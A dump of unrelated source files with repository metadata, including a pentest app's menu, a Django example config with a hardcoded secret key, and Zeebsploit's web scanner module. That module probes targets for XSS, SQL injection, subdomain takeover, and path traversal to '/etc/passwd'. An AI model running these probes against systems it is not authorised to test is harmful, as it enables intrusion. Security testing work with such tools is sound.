step_dict['bids'] = ', '.join(['{}: {:.5f}'.format(a_id, bid) for a_id, bid in step_data.bids.items()])
step_dict['payoffs'] = ', '.join(['{}: {:.5f}'.format(a_id, payoff) for a_id, payoff in step_data.payoffs.items()])
self.logger.printf(log_string(step_dict))
| true
| true
|
1c3e966b1c5c70d1bbee3ae15b82d627d6a88bb5
| 192
|
py
|
Python
|
Mock/Midterm/q1c-unnerfed.py
|
RussellDash332/practice-makes-perfect
|
917822b461550a2e3679351e467362f95d9e428d
|
[
"MIT"
] | 2
|
2021-11-18T06:22:09.000Z
|
2021-12-25T09:52:57.000Z
|
Mock/Midterm/q1c-unnerfed.py
|
RussellDash332/practice-makes-perfect
|
917822b461550a2e3679351e467362f95d9e428d
|
[
"MIT"
] | 2
|
2021-11-17T16:28:00.000Z
|
2021-12-01T09:59:40.000Z
|
Mock/Midterm/q1c-unnerfed.py
|
RussellDash332/practice-makes-perfect
|
917822b461550a2e3679351e467362f95d9e428d
|
[
"MIT"
] | null | null | null |
m, p = "mutton", "python"
mp = m+p+"ton"
if "on" in mp:
if p in mp:
p = "p"
print("yum")
if "on" in p:
print("bum")
elif mp:
print("tum")
| 17.454545
| 26
| 0.390625
|
m, p = "mutton", "python"
mp = m+p+"ton"
if "on" in mp:
if p in mp:
p = "p"
print("yum")
if "on" in p:
print("bum")
elif mp:
print("tum")
| true
| true
|
1c3e96a2f308439d029d90059fce07c86e844515
| 7,848
|
py
|
Python
|
models/menu.py
|
juushya/Kvasir
|
bc9fa5864ed1cf40a3a4fe2dae7f24f754267c78
|
[
"BSD-3-Clause"
] | null | null | null |
models/menu.py
|
juushya/Kvasir
|
bc9fa5864ed1cf40a3a4fe2dae7f24f754267c78
|
[
"BSD-3-Clause"
] | null | null | null |
models/menu.py
|
juushya/Kvasir
|
bc9fa5864ed1cf40a3a4fe2dae7f24f754267c78
|
[
"BSD-3-Clause"
] | null | null | null |
_a = request.application
response.logo = A(B('KVASIR'), _class="brand")
response.title = settings.title
response.subtitle = settings.subtitle
response.meta.author = '%s <%s>' % (settings.author, settings.author_email)
response.meta.keywords = settings.keywords
response.meta.description = settings.description
response.menu = [
(T('Home'), False, URL(_a,'default','index'), []),
# (A(I(_class='icon-home icon-white'), T('Home'), _href=URL('default', 'index')), False, []),
(T('All Hosts'), False, URL(_a,'hosts','list'), []),
# (A(I(_class='icon-th-list icon-white'), T('All Hosts'), _href=URL('hosts', 'list')), False, []),
(T('Host Data'), False, '',
[
(T('Add Host'), False, URL(_a,'hosts','add'), []),
(T('Services'), False, '',
[
(T('List All'), False, URL(_a,'services','list'), []),
#(T('All w/ Vulns'), False, URL(_a,'vulns','service_vulns_list'), []), # TODO: service_vulns_list
(T('IPs w/ Port'), False, URL(_a,'services','hosts_with_port'), []),
(T('Add'), False, URL(_a,'services','add'), []),
]),
(T('Accounts'), False, '',
[
(T('List'), False, URL(_a,'accounts', 'list'), []),
(T('Add'), False, URL(_a,'accounts', 'add'), []),
(T('Import File'), False, URL(_a,'accounts', 'import_file'), []),
(T('Mass Import'), False, URL(_a,'accounts', 'import_mass_password'), []),
(T('Process crack file'), False, URL(_a,'accounts', 'update_hashes_by_file'), []),
(T('Process john.pot'), False, URL(_a,'accounts', 'check_john_pot'), []),
]),
(T('NetBIOS'), False, '',
[
(T('Domain Details'), False, URL(_a,'netbios','domain_detail'), []),
(T('List'), False, URL(_a,'netbios','index'), []),
(T('Add'), False, URL(_a,'netbios','add'), []),
]),
(T('OS'), False, '',
[
(T('List'), False, URL(_a,'os','list'), []),
(T('Add '), False, URL(_a,'os','add'), []),
(T('List OS Refs'), False, URL(_a,'os','refs_list'), []),
(T('Add OS Ref'), False, URL(_a,'os','refs_add'), []),
]),
(T('Other'), False, '',
[
(T('List Evidence'), False, URL(_a,'evidence','list'), []),
(T('List Notes'), False, URL(_a,'notes','list'), []),
(T('List SNMP'), False, URL(_a,'snmp','list'), []),
(T('List Tool Output'), False, URL(_a,'tooloutput','list'), []),
(T('CSV Hostname Update'), False, URL(_a,'hosts','csv_hostupdate'), []),
]),
]),
(T('Tasks'), False, URL(_a,'tasks','index'), []),
(T('Metasploit'), False, '',
[
(T('Mass Jobs'), False, '',
[
(T('Bruteforce'), False, URL(_a, 'metasploit', 'bruteforce'), []),
(T('Exploit'), False, URL(_a, 'metasploit', 'exploit'), []),
]),
(T('Imports'), False, '',
[
(T('PWDUMP Files'), False, URL(_a, 'metasploit', 'import_pwdump'), []),
(T('Screenshots'), False, URL(_a, 'metasploit', 'import_screenshots'), []),
(T('Report XML'), False, URL(_a, 'metasploit', 'import_report_xml'), []),
]),
(T('Send Accounts'), False, URL(_a, 'metasploit', 'send_accounts'), []),
(T('Send Scan XML Files'), False, URL(_a, 'metasploit', 'send_scanxml'), []),
(T('API Settings'), False, URL(_a, 'metasploit', 'api_settings'), []),
#(T('Tasks'), False, URL(_a, 'metasploit', 'task_list'), []),
]),
(T('Other'), False, '',
[
(T('Browse Data Directory'), False, URL(_a, 'default', 'data_dir'), []),
(T('Customer XML'),URL(_a,'report','customer_xml.xml')==URL(),URL(_a,'report','customer_xml.xml'),[]),
(T('Stats XLS'),URL(_a,'report','spreadsheet')==URL(),URL(_a,'report','spreadsheet'),[]),
(T('Wiki'),URL(_a,'default','wiki')==URL(),URL(_a,'default','wiki'),[]),
(T('Update DB Fields'),URL(_a,'default','update_dynamic_fields')==URL(),URL(_a,'default','update_dynamic_fields'),[]),
(T('IP Calculator'), False, URL(_a, 'default', 'ip_calc'), []),
(T('Exploit Database (local)'), False, URL(_a, 'exploitdb', 'index'), []),
(T('PwnWiki'), False, URL(_a, 'default', 'redirect', vars={'url':settings.pwnwiki_path, 'pwnwiki': True}), []),
]),
(T('Statistics'), False, '',
[
(T('Vulnlist'), False, URL(_a,'stats','vulnlist'), []),
(T('Passwords'), False, URL(_a,'stats','passwords'), []),
(T('OS'), False, URL(_a,'stats','os'), []),
(T('Services'), False, URL(_a,'stats','services'), []),
(T('VulnCircles'), False, URL(_a,'stats','vulncircles'), []),
]),
(T('Import'), False ,'',
[
(T('Nexpose XML'), False, URL(_a,'nexpose','import_xml_scan'), []),
(T('Nmap XML'), False, URL(_a,'nmap','import_xml_scan'), []),
(T('Nmap Scan and Import'), False, URL(_a,'nmap','nmap_scan'), []),
(T('Nessus Scanfile'), False, URL(_a,'nessus','import_scan'), []),
(T('hping File'), False, URL(_a,'hping','import_scan'), []),
(T('Metasploit XML'), False, URL(_a, 'metasploit', 'import_report_xml'), []),
(T('ShodanHQ'), False, URL(_a, 'shodanhq', 'import_report'), []),
]),
(T('Administration'), False, '',
[
(T('Nexpose'), False, '',
[
(T('Install/Update VulnData'),URL(_a,'nexpose','vuln_update')==URL(),URL(_a,'nexpose','vuln_update'),[]),
#(T('Import Scan Template '),URL(_a,'nexpose','scan_template')==URL(),URL(_a,'nexpose','scan_template'),[]),
(T('Import VulnID'), False, URL(_a, 'nexpose', 'import_vulnid'), []),
(T('Import Exploit XML'),URL(_a,'exploits','import_nexpose_xml')==URL(),URL(_a,'exploits','import_nexpose_xml'),[]),
(T('Purge Nexpose Data'),URL(_a,'nexpose','purge')==URL(),URL(_a,'nexpose','purge'),[]),
]),
(T('VulnDB'), False, '',
[
(T('Vulnerabilities'), False, URL(_a,'vulns','vulndata_list'),[]),
(T('Add Vulnerability'), False, URL(_a,'vulns','vulndata_add'),[]),
(T('References'), False, URL(_a,'vulns','vuln_refs'),[]),
(T('Vuln->Reference Links'), False, URL(_a,'vulns','vuln_references_list'),[]),
(T('Exploits'), False, URL(_a,'exploits','list'),[]),
(T('Connect Vulns/Exploits'), False, URL(_a,'exploits','connect_exploits'), []),
(T('Import Nexpose Exploits'), False, URL(_a,'exploits','import_nexpose_xml'),[]),
(T('Import CANVAS Exploits'), False, URL(_a,'exploits','import_canvas_xml'),[]),
]),
(T('CPE Database'), False, '',
[
(T('Import CPE Data'), False, URL(_a,'cpe','import_cpe_xml'), []),
(T('List OS DB'), False, URL(_a,'cpe','os_list'), []),
(T('Add OS'), False, URL(_a,'cpe','os_add'), []),
#(T('List Application DB'), False, URL(_a,'cpe','apps_list'), []),
#(T('Add Application'), False, URL(_a,'cpe','apps_add'), []),
#(T('List Hardware DB'), False, URL(_a,'cpe','hardware_list'), []),
#(T('Add Hardware'), False, URL(_a,'cpe','hardware_add'), []),
(T('Purge CPE DB'), False, URL(_a,'cpe','purge'), []),
]),
(T('Last Resort'), False, '',
[
(T('CSV Backup'), False, URL(_a,'default','database_backup'),[]),
(T('CSV Restore'), False, URL(_a,'default','database_restore'),[]),
(T('Purge Data'), URL(_a,'default','purge_data')==URL(),URL(_a,'default','purge_data'),[]),
]),
]),
]
| 53.753425
| 130
| 0.49554
|
_a = request.application
response.logo = A(B('KVASIR'), _class="brand")
response.title = settings.title
response.subtitle = settings.subtitle
response.meta.author = '%s <%s>' % (settings.author, settings.author_email)
response.meta.keywords = settings.keywords
response.meta.description = settings.description
response.menu = [
(T('Home'), False, URL(_a,'default','index'), []),
(T('All Hosts'), False, URL(_a,'hosts','list'), []),
(T('Host Data'), False, '',
[
(T('Add Host'), False, URL(_a,'hosts','add'), []),
(T('Services'), False, '',
[
(T('List All'), False, URL(_a,'services','list'), []),
Port'), False, URL(_a,'services','hosts_with_port'), []),
(T('Add'), False, URL(_a,'services','add'), []),
]),
(T('Accounts'), False, '',
[
(T('List'), False, URL(_a,'accounts', 'list'), []),
(T('Add'), False, URL(_a,'accounts', 'add'), []),
(T('Import File'), False, URL(_a,'accounts', 'import_file'), []),
(T('Mass Import'), False, URL(_a,'accounts', 'import_mass_password'), []),
(T('Process crack file'), False, URL(_a,'accounts', 'update_hashes_by_file'), []),
(T('Process john.pot'), False, URL(_a,'accounts', 'check_john_pot'), []),
]),
(T('NetBIOS'), False, '',
[
(T('Domain Details'), False, URL(_a,'netbios','domain_detail'), []),
(T('List'), False, URL(_a,'netbios','index'), []),
(T('Add'), False, URL(_a,'netbios','add'), []),
]),
(T('OS'), False, '',
[
(T('List'), False, URL(_a,'os','list'), []),
(T('Add '), False, URL(_a,'os','add'), []),
(T('List OS Refs'), False, URL(_a,'os','refs_list'), []),
(T('Add OS Ref'), False, URL(_a,'os','refs_add'), []),
]),
(T('Other'), False, '',
[
(T('List Evidence'), False, URL(_a,'evidence','list'), []),
(T('List Notes'), False, URL(_a,'notes','list'), []),
(T('List SNMP'), False, URL(_a,'snmp','list'), []),
(T('List Tool Output'), False, URL(_a,'tooloutput','list'), []),
(T('CSV Hostname Update'), False, URL(_a,'hosts','csv_hostupdate'), []),
]),
]),
(T('Tasks'), False, URL(_a,'tasks','index'), []),
(T('Metasploit'), False, '',
[
(T('Mass Jobs'), False, '',
[
(T('Bruteforce'), False, URL(_a, 'metasploit', 'bruteforce'), []),
(T('Exploit'), False, URL(_a, 'metasploit', 'exploit'), []),
]),
(T('Imports'), False, '',
[
(T('PWDUMP Files'), False, URL(_a, 'metasploit', 'import_pwdump'), []),
(T('Screenshots'), False, URL(_a, 'metasploit', 'import_screenshots'), []),
(T('Report XML'), False, URL(_a, 'metasploit', 'import_report_xml'), []),
]),
(T('Send Accounts'), False, URL(_a, 'metasploit', 'send_accounts'), []),
(T('Send Scan XML Files'), False, URL(_a, 'metasploit', 'send_scanxml'), []),
(T('API Settings'), False, URL(_a, 'metasploit', 'api_settings'), []),
]),
(T('Other'), False, '',
[
(T('Browse Data Directory'), False, URL(_a, 'default', 'data_dir'), []),
(T('Customer XML'),URL(_a,'report','customer_xml.xml')==URL(),URL(_a,'report','customer_xml.xml'),[]),
(T('Stats XLS'),URL(_a,'report','spreadsheet')==URL(),URL(_a,'report','spreadsheet'),[]),
(T('Wiki'),URL(_a,'default','wiki')==URL(),URL(_a,'default','wiki'),[]),
(T('Update DB Fields'),URL(_a,'default','update_dynamic_fields')==URL(),URL(_a,'default','update_dynamic_fields'),[]),
(T('IP Calculator'), False, URL(_a, 'default', 'ip_calc'), []),
(T('Exploit Database (local)'), False, URL(_a, 'exploitdb', 'index'), []),
(T('PwnWiki'), False, URL(_a, 'default', 'redirect', vars={'url':settings.pwnwiki_path, 'pwnwiki': True}), []),
]),
(T('Statistics'), False, '',
[
(T('Vulnlist'), False, URL(_a,'stats','vulnlist'), []),
(T('Passwords'), False, URL(_a,'stats','passwords'), []),
(T('OS'), False, URL(_a,'stats','os'), []),
(T('Services'), False, URL(_a,'stats','services'), []),
(T('VulnCircles'), False, URL(_a,'stats','vulncircles'), []),
]),
(T('Import'), False ,'',
[
(T('Nexpose XML'), False, URL(_a,'nexpose','import_xml_scan'), []),
(T('Nmap XML'), False, URL(_a,'nmap','import_xml_scan'), []),
(T('Nmap Scan and Import'), False, URL(_a,'nmap','nmap_scan'), []),
(T('Nessus Scanfile'), False, URL(_a,'nessus','import_scan'), []),
(T('hping File'), False, URL(_a,'hping','import_scan'), []),
(T('Metasploit XML'), False, URL(_a, 'metasploit', 'import_report_xml'), []),
(T('ShodanHQ'), False, URL(_a, 'shodanhq', 'import_report'), []),
]),
(T('Administration'), False, '',
[
(T('Nexpose'), False, '',
[
(T('Install/Update VulnData'),URL(_a,'nexpose','vuln_update')==URL(),URL(_a,'nexpose','vuln_update'),[]),
(T('Import VulnID'), False, URL(_a, 'nexpose', 'import_vulnid'), []),
(T('Import Exploit XML'),URL(_a,'exploits','import_nexpose_xml')==URL(),URL(_a,'exploits','import_nexpose_xml'),[]),
(T('Purge Nexpose Data'),URL(_a,'nexpose','purge')==URL(),URL(_a,'nexpose','purge'),[]),
]),
(T('VulnDB'), False, '',
[
(T('Vulnerabilities'), False, URL(_a,'vulns','vulndata_list'),[]),
(T('Add Vulnerability'), False, URL(_a,'vulns','vulndata_add'),[]),
(T('References'), False, URL(_a,'vulns','vuln_refs'),[]),
(T('Vuln->Reference Links'), False, URL(_a,'vulns','vuln_references_list'),[]),
(T('Exploits'), False, URL(_a,'exploits','list'),[]),
(T('Connect Vulns/Exploits'), False, URL(_a,'exploits','connect_exploits'), []),
(T('Import Nexpose Exploits'), False, URL(_a,'exploits','import_nexpose_xml'),[]),
(T('Import CANVAS Exploits'), False, URL(_a,'exploits','import_canvas_xml'),[]),
]),
(T('CPE Database'), False, '',
[
(T('Import CPE Data'), False, URL(_a,'cpe','import_cpe_xml'), []),
(T('List OS DB'), False, URL(_a,'cpe','os_list'), []),
(T('Add OS'), False, URL(_a,'cpe','os_add'), []),
(T('Purge CPE DB'), False, URL(_a,'cpe','purge'), []),
]),
(T('Last Resort'), False, '',
[
(T('CSV Backup'), False, URL(_a,'default','database_backup'),[]),
(T('CSV Restore'), False, URL(_a,'default','database_restore'),[]),
(T('Purge Data'), URL(_a,'default','purge_data')==URL(),URL(_a,'default','purge_data'),[]),
]),
]),
]
| true
| true
|
1c3e9722782b9f83edcb11429ff520945f9729f7
| 2,066
|
py
|
Python
|
example/app/settings.py
|
jbking/django-oidc-provider
|
f0daed07b2ac7608565b80d4c80ccf04d8c416a8
|
[
"MIT"
] | 370
|
2015-03-10T03:12:53.000Z
|
2022-03-13T05:49:40.000Z
|
example/app/settings.py
|
jbking/django-oidc-provider
|
f0daed07b2ac7608565b80d4c80ccf04d8c416a8
|
[
"MIT"
] | 305
|
2015-02-12T17:58:26.000Z
|
2022-02-25T19:48:41.000Z
|
example/app/settings.py
|
jbking/django-oidc-provider
|
f0daed07b2ac7608565b80d4c80ccf04d8c416a8
|
[
"MIT"
] | 271
|
2015-03-17T00:57:22.000Z
|
2022-02-17T11:21:22.000Z
|
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = 'c14d549c574e4d8cf162404ef0b04598'
DEBUG = True
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'oidc_provider',
]
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'oidc_provider.middleware.SessionManagementMiddleware',
]
MIDDLEWARE = MIDDLEWARE_CLASSES
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ROOT_URLCONF = 'app.urls'
WSGI_APPLICATION = 'app.wsgi.application'
# Database
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'DATABASE.sqlite3'),
}
}
# Internationalization
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
# Custom settings
LOGIN_REDIRECT_URL = '/'
# OIDC Provider settings
SITE_URL = 'http://localhost:8000'
OIDC_SESSION_MANAGEMENT_ENABLE = True
| 22.456522
| 71
| 0.683446
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
SECRET_KEY = 'c14d549c574e4d8cf162404ef0b04598'
DEBUG = True
TEMPLATE_DEBUG = False
ALLOWED_HOSTS = ['*']
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app',
'oidc_provider',
]
MIDDLEWARE_CLASSES = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'oidc_provider.middleware.SessionManagementMiddleware',
]
MIDDLEWARE = MIDDLEWARE_CLASSES
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
ROOT_URLCONF = 'app.urls'
WSGI_APPLICATION = 'app.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'DATABASE.sqlite3'),
}
}
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static/')
LOGIN_REDIRECT_URL = '/'
SITE_URL = 'http://localhost:8000'
OIDC_SESSION_MANAGEMENT_ENABLE = True
| true
| true
|
1c3e998b9342a4dd7b2dce19744c8e34e5d95b7c
| 180
|
py
|
Python
|
tests/web_platform/css_flexbox_1/test_flexbox_flex_0_1_N_unitless_basis.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/web_platform/css_flexbox_1/test_flexbox_flex_0_1_N_unitless_basis.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | null | null | null |
tests/web_platform/css_flexbox_1/test_flexbox_flex_0_1_N_unitless_basis.py
|
fletchgraham/colosseum
|
77be4896ee52b8f5956a3d77b5f2ccd2c8608e8f
|
[
"BSD-3-Clause"
] | 1
|
2020-01-16T01:56:41.000Z
|
2020-01-16T01:56:41.000Z
|
from tests.utils import W3CTestCase
class TestFlexbox_Flex01NUnitlessBasis(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'flexbox_flex-0-1-N-unitless-basis'))
| 30
| 88
| 0.811111
|
from tests.utils import W3CTestCase
class TestFlexbox_Flex01NUnitlessBasis(W3CTestCase):
vars().update(W3CTestCase.find_tests(__file__, 'flexbox_flex-0-1-N-unitless-basis'))
| true
| true
|
1c3e9a29ee05e6cb175f2be801373c64e64750f2
| 481
|
py
|
Python
|
test/test_db_matches_ui.py
|
karagioz/python_training
|
47bdbc550eda347f72aaf75dd3569d2c61106356
|
[
"Apache-2.0"
] | null | null | null |
test/test_db_matches_ui.py
|
karagioz/python_training
|
47bdbc550eda347f72aaf75dd3569d2c61106356
|
[
"Apache-2.0"
] | null | null | null |
test/test_db_matches_ui.py
|
karagioz/python_training
|
47bdbc550eda347f72aaf75dd3569d2c61106356
|
[
"Apache-2.0"
] | null | null | null |
from model.group import Group
from timeit import timeit
def test_group_list(app, db):
print(timeit(lambda: app.group.get_group_list(), number=1))
ui_list = app.group.get_group_list()
def clean(group):
return Group(id=group.id, name=group.name.strip())
print(timeit(lambda: map(clean, db.get_group_list()), number=1000))
db_list = map(clean, db.get_group_list())
assert sorted(ui_list, key=Group.id_or_max) == sorted(db_list, key=Group.id_or_max)
| 34.357143
| 87
| 0.715177
|
from model.group import Group
from timeit import timeit
def test_group_list(app, db):
print(timeit(lambda: app.group.get_group_list(), number=1))
ui_list = app.group.get_group_list()
def clean(group):
return Group(id=group.id, name=group.name.strip())
print(timeit(lambda: map(clean, db.get_group_list()), number=1000))
db_list = map(clean, db.get_group_list())
assert sorted(ui_list, key=Group.id_or_max) == sorted(db_list, key=Group.id_or_max)
| true
| true
|
1c3e9a93f3dffeb4d7093c7ec141c50bb1019b1f
| 4,850
|
py
|
Python
|
zeeb_src/lib/scanner.py
|
th3cyb3rc0p/Zeebsploit
|
5d3bee6c3a459f172ef117548c3a895195a249ff
|
[
"Apache-2.0"
] | 186
|
2019-02-01T16:14:09.000Z
|
2022-03-10T06:43:16.000Z
|
zeeb_src/lib/scanner.py
|
Tonymmm/Zeebsploit
|
5d3bee6c3a459f172ef117548c3a895195a249ff
|
[
"Apache-2.0"
] | 8
|
2019-02-02T19:09:07.000Z
|
2019-10-03T05:06:27.000Z
|
zeeb_src/lib/scanner.py
|
Tonymmm/Zeebsploit
|
5d3bee6c3a459f172ef117548c3a895195a249ff
|
[
"Apache-2.0"
] | 65
|
2019-02-25T07:28:03.000Z
|
2021-10-30T19:59:57.000Z
|
#-*- coding: utf-8 -*-
import asyncio,aiohttp,requests,os,urllib3,aiofiles,re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class subdomain_enumeration(object):
def __init__(self,domain):
self.domain = domain
self.url = 'https://dnsdumpster.com'
self.uag = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
self.dns_dumpster = []
def DNSdumpster(self):
get_token = requests.get(self.url,headers={'User-Agent':self.uag})
token = re.findall("value=\'(.*?)\'",get_token.text)[0]
post = requests.post(
self.url,
data={
'csrfmiddlewaretoken':token,
'targetip':self.domain
},
cookies={
'csrftoken':token
},
headers={
'User-Agent':self.uag,
'Referer':self.url
}
)
subdo = re.findall('http://(.*?)"',post.text)
for x in subdo:
self.dns_dumpster.append(x)
@property
def raw_result(self):
return self.dns_dumpster
class fuzzer(object):
def __init__(self,target,path):
self.target = target
self.path = path
self.user_agent = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'}
self.__xss_result = []
self.__fuzz = []
@property
def raw_xss_result(self):
return self.__xss_result
@property
def raw_fuzz(self):
return self.__fuzz
async def request(self,payload,session,isi):
try:
async with session.get(f'{self.target}/{payload}',ssl=False) as resp:
content = await resp.text()
status = resp.status
if 'xss' in isi:
if payload in content:
self.__xss_result.append(resp.url)
print(f'\033[92m[+]\033[0m {resp.url} : \033[92m{resp.status}\033[0m')
else:
print(f'\033[91m[-]\033[0m {resp.url} : \033[93m{resp.status}\033[0m')
else:
if status == 200:
print(f'\033[92m[+]\033[0m {resp.url} : \033[92m{resp.status}\033[0m')
self.__fuzz.append(resp.url)
else:
print(f'\033[91m[-]\033[0m {resp.url} : \033[93m{resp.status}\033[0m')
resp.closed
except Exception:
pass
async def _fetch(self,iii):
connector = aiohttp.TCPConnector(limit=None)
async with aiohttp.ClientSession(connector=connector) as sesi:
with open(self.path,'r') as open_files:
tas = [self.request(pilod.rstrip(),sesi,iii)for pilod in open_files.readlines()]
await asyncio.gather(*tas)
@classmethod
def sqli_scan(cls,url,query_error):
vuln = 0
types = ''
error = ''
r = requests.get(
f"{url}'",
headers = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
for a,b in query_error.items():
if re.search(b,r.text):
vuln += 1
types += a
error += b
break
else:
pass
return vuln,types,error
@classmethod
def subdomain_takeover(cls,url,query_error):
vuln = ''
r = requests.get(
url,
headers={'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
for a,b in query_error.items():
if re.search(b,r.text,re.I) and re.search('[300-499]',str(r.status_code)):
vuln += a
break
else:
pass
return vuln
@classmethod
def lfi_scanner(cls,url):
vuln = ''
params = '../'
for x in range(1,20):
p = params*x
r = requests.get(
f'{url}{p}/etc/passwd',
headers = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
if 'root:x:0:0' in r.text:
print(f'\033[92m[+]\033[0m {r.url} : \033[92mvulnerability\033[0m')
else:
print(f'\033[93m[-]\033[0m {r.url} : \033[93not mvulnerability\033[0m')
| 35.925926
| 117
| 0.478144
|
import asyncio,aiohttp,requests,os,urllib3,aiofiles,re
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class subdomain_enumeration(object):
def __init__(self,domain):
self.domain = domain
self.url = 'https://dnsdumpster.com'
self.uag = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'
self.dns_dumpster = []
def DNSdumpster(self):
get_token = requests.get(self.url,headers={'User-Agent':self.uag})
token = re.findall("value=\'(.*?)\'",get_token.text)[0]
post = requests.post(
self.url,
data={
'csrfmiddlewaretoken':token,
'targetip':self.domain
},
cookies={
'csrftoken':token
},
headers={
'User-Agent':self.uag,
'Referer':self.url
}
)
subdo = re.findall('http://(.*?)"',post.text)
for x in subdo:
self.dns_dumpster.append(x)
@property
def raw_result(self):
return self.dns_dumpster
class fuzzer(object):
def __init__(self,target,path):
self.target = target
self.path = path
self.user_agent = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'}
self.__xss_result = []
self.__fuzz = []
@property
def raw_xss_result(self):
return self.__xss_result
@property
def raw_fuzz(self):
return self.__fuzz
async def request(self,payload,session,isi):
try:
async with session.get(f'{self.target}/{payload}',ssl=False) as resp:
content = await resp.text()
status = resp.status
if 'xss' in isi:
if payload in content:
self.__xss_result.append(resp.url)
print(f'\033[92m[+]\033[0m {resp.url} : \033[92m{resp.status}\033[0m')
else:
print(f'\033[91m[-]\033[0m {resp.url} : \033[93m{resp.status}\033[0m')
else:
if status == 200:
print(f'\033[92m[+]\033[0m {resp.url} : \033[92m{resp.status}\033[0m')
self.__fuzz.append(resp.url)
else:
print(f'\033[91m[-]\033[0m {resp.url} : \033[93m{resp.status}\033[0m')
resp.closed
except Exception:
pass
async def _fetch(self,iii):
connector = aiohttp.TCPConnector(limit=None)
async with aiohttp.ClientSession(connector=connector) as sesi:
with open(self.path,'r') as open_files:
tas = [self.request(pilod.rstrip(),sesi,iii)for pilod in open_files.readlines()]
await asyncio.gather(*tas)
@classmethod
def sqli_scan(cls,url,query_error):
vuln = 0
types = ''
error = ''
r = requests.get(
f"{url}'",
headers = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
for a,b in query_error.items():
if re.search(b,r.text):
vuln += 1
types += a
error += b
break
else:
pass
return vuln,types,error
@classmethod
def subdomain_takeover(cls,url,query_error):
vuln = ''
r = requests.get(
url,
headers={'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
for a,b in query_error.items():
if re.search(b,r.text,re.I) and re.search('[300-499]',str(r.status_code)):
vuln += a
break
else:
pass
return vuln
@classmethod
def lfi_scanner(cls,url):
vuln = ''
params = '../'
for x in range(1,20):
p = params*x
r = requests.get(
f'{url}{p}/etc/passwd',
headers = {'User-Agent':'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'},
verify=False
)
if 'root:x:0:0' in r.text:
print(f'\033[92m[+]\033[0m {r.url} : \033[92mvulnerability\033[0m')
else:
print(f'\033[93m[-]\033[0m {r.url} : \033[93not mvulnerability\033[0m')
| true
| true
|
1c3e9aa4508a692e561336b57c059caf9056b9b3
| 2,948
|
py
|
Python
|
process.py
|
yangliu2/BearNotes_to_Notion
|
ae06f4c3fbdefe2020899416e5b478ad9d434664
|
[
"MIT"
] | 1
|
2021-02-07T17:59:26.000Z
|
2021-02-07T17:59:26.000Z
|
process.py
|
yangliu2/BearNotes_to_Notion
|
ae06f4c3fbdefe2020899416e5b478ad9d434664
|
[
"MIT"
] | null | null | null |
process.py
|
yangliu2/BearNotes_to_Notion
|
ae06f4c3fbdefe2020899416e5b478ad9d434664
|
[
"MIT"
] | null | null | null |
from glob import glob
from pathlib import Path
def bear_to_notion(source_folder: str = 'bear_notes',
dst_folder: str = 'changed_notes') -> None:
